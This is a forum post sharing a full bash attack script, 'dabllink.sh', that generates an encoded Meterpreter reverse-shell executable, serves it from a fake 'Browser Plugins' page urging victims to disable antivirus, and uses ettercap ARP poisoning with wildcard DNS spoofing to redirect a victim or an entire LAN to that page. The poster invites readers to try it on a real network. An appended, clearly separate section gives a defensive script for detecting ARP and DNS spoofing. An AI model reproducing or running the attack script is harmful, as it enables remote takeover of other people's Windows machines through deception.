Auto Exploit Script [Ettercap + DNS Spoofing] Method
Assalamualaikum, everyone...
I'm back again with a new thread. I've dug around here and there and haven't seen this one posted yet (if it's a repost, just delete it).
I've kept this script for a very long time but never got the chance to share it (I didn't know how to make a thread yet).
Now is a good opportunity to share this script, a "bash" script whose function is to exploit Windows using the "ettercap + dnsspoofing" technique (maybe the manual way has already been posted).

I named this script dabllink.sh because its author is dabllink. That's why I gave it that name.
OK, next is the code:

Code:
#!/bin/bash
#Simple Bypass Firewall ( Easy metasploit + dns spoofing etc )
#Created By Dabllink
#save this file @ root
#Thanks to :
#p0zh1e,SoNz,BeraagaZZS, haryo aka autorun.inf, Syndrom2211, SutuL , Ihsan , all lost-c0de & CBF crew....
#special thanks to : brother Blusp10it & Red-Dragon..
clear
apt-get install figlet
clear
echo "================================================="
figlet Dabllink
echo "================================================="
echo
echo -en "input ip anda : "
read ip
echo
echo -en "input port anda: "
read port
echo
echo "Tunggu , sedang proses (backdooring)....."
msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/nc11gs.exe
clear
panggilmsfcli() {
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=$port LHOST=$ip E
}


gnome() {

echo '#!/bin/bash
cetaklagi() {
echo " dns spoofing :)"
echo
echo -en " input interfaces anda : "
read interfaces
echo -en " apa anda sudah punya target ? (y/n) "
read pilihan
if [ $pilihan == "y" ]; then
echo -en " input ip korban : "
read ipkorban
echo -en " input ip gateway : "
read ipgateway
ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
elif [ $pilihan == "n" ]; then
ettercap -Tqi $interfaces -P dns_spoof -M arp // //
else
cetaklagi
fi
exec bash
}
cetaklagi' > /root/spoof.sh
clear
echo "Sedang membuka terminal baru"
sleep 2
chmod +x spoof.sh
gnome-terminal --command="./spoof.sh"
echo "exploit............................................ "
panggilmsfcli
}

kde() {
echo '#!/bin/bash
cetaklagi() {
echo " dns spoofing :)"
echo
echo -en " input interfaces anda : "
read interfaces
echo -en " apa anda sudah punya target ? (y/n) "
read pilihan
if [ $pilihan == "y" ]; then
echo -en " input ip korban : "
read ipkorban
echo -en " input ip gateway : "
read ipgateway
ettercap -Tqi $interfaces -P dns_spoof -M arp:remote /$ipgateway/ /$ipkorban/
elif [ $pilihan == "n" ]; then
ettercap -Tqi $interfaces -P dns_spoof -M arp // //
else
cetaklagi
fi
exec bash
}
cetaklagi' > /root/spoof.sh
clear
echo "Sedang membuka terminal baru"
sleep 2
chmod +x spoof.sh
konsole --noclose -e ./spoof.sh
echo "exploit............................................ "
panggilmsfcli

}

clear
/etc/init.d/apache2 start
clear

rm /var/www/index.html
echo '<html>
<head>
<title>Browser Plugins !!!</title>
</head>
<body>
<p align="center" class="style2"><u><b>Perhatian! </u></b>install plugins browser anda jika ingin melanjutkan browsing, pastikan tidak ada yang menghambat saat pengunduhan dan penginstalan sedang berjalan <b>seperti antivirus</b></p>
<p align="center">
<input align="center" type="button" name="Button" value="UNDUH SEKARANG" onClick="window.open' >> /var/www/index.html
echo "('/nc11gs.exe','download');" >> /var/www/index.html
echo 'return false;"></p>
</body>
</html>' >> /var/www/index.html
clear
cetak() {
echo "1. /usr/local/share/ettercap/etter.dns"
echo
echo "2. /usr/share/ettercap/etter.dns "
echo
echo -en "Masukan tempat etter.dns anda berada (1/2): "
read pilihan
if [ $pilihan == "1" ]; then
echo "* A $ip" > /usr/local/share/ettercap/etter.dns  
elif [ $pilihan == "2" ]; then
echo "* A $ip" > /usr/share/ettercap/etter.dns
else
clear
cetak
fi
}
cetak
clear


echo -en "Anda menggunakan kde/gnome? "
read pilihanzz
$pilihanzz

#M02X TeaM ..

Save and store it in root (what's the difference between save and store, anyway) with the file name dabllink.sh (another name is fine too), but don't change the author, OK. Otherwise dabllink will get angry, hehehehe...
Continuing with the explanation: "why does it have to be saved in "root"??"
Well, because the DNS spoofing part is saved at "/root/spoof.sh". It can also be saved in any directory; what matters is that spoof.sh points to exactly the directory where it is saved.

Example:
I saved "dabllink.sh" in the directory "/pentest/framework/", so naturally I edited the spoof.sh path to "/pentest/framework/spoof.sh".

OK, good luck trying it.
If you have VirtualBox, try it there; if not, just use a real network, hehehe.

Next, a.k.a. moving on.
Eh, it looks like our discussion is already over. OK then, friends, I'm ready to receive the "green ones", hehehehe...


Thanks to dabllink (even though I don't know the person).



Quote:~ Tan Hana Wighna Tan Sirna ~
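
From the defender's side, the two steps the script above automates (ARP poisoning via `-M arp`, and the catch-all `* A $ip` entry written to etter.dns) both leave visible traces on the victim network. The following is an added example, not part of the original post or of dabllink's script: it flags a MAC address claimed by more than one IP in an `ip neigh`-style snapshot, and a private address returned for many unrelated names. The function names and all sample data are constructed for illustration.

```shell
#!/bin/sh
# Added defensive example; every sample value below is constructed.

# Constructed `ip neigh`-style snapshot: gateway .1 and host .23 share one
# MAC, which is how a poisoned ARP cache looks from the victim's side.
SAMPLE_NEIGH='192.168.1.1 dev eth0 lladdr 08:00:27:AA:BB:CC REACHABLE
192.168.1.23 dev eth0 lladdr 08:00:27:aa:bb:cc STALE
192.168.1.40 dev eth0 lladdr 52:54:00:12:34:56 REACHABLE'

# Constructed resolver log, one answer per line: "<queried name> <A record>".
SAMPLE_DNS='example.com 192.168.1.23
update.example.org 192.168.1.23
mail.example.net 192.168.1.23
example.com 192.168.1.23
intranet.example.lan 192.168.1.10'

# Print each MAC claimed by more than one IP, followed by the IPs claiming it.
find_duplicate_macs() {
  awk '{ for (i = 1; i < NF; i++) if ($i == "lladdr") {
           mac = tolower($(i + 1))
           ips[mac] = (n[mac]++ ? ips[mac] "," : "") $1 } }
       END { for (m in n) if (n[m] > 1) print m, ips[m] }'
}

# Print each RFC 1918 address returned for at least $1 distinct names,
# with the number of names. A wildcard "* A <ip>" spoof produces exactly this.
find_wildcard_answers() {
  awk -v min="$1" '
    $2 ~ /^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/ {
      if (!seen[$2 SUBSEP $1]++) names[$2]++ }
    END { for (ip in names) if (names[ip] >= min) print ip, names[ip] }'
}

# Run both checks on the constructed samples.
printf '%s\n' "$SAMPLE_NEIGH" | find_duplicate_macs
printf '%s\n' "$SAMPLE_DNS"   | find_wildcard_answers 3
```

On a live host, feed `ip neigh show` into the first function; a hit that includes the default gateway's IP is the one to investigate first. Static ARP entries for the gateway or switch-level Dynamic ARP Inspection remove the precondition for the spoofed DNS answers entirely.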

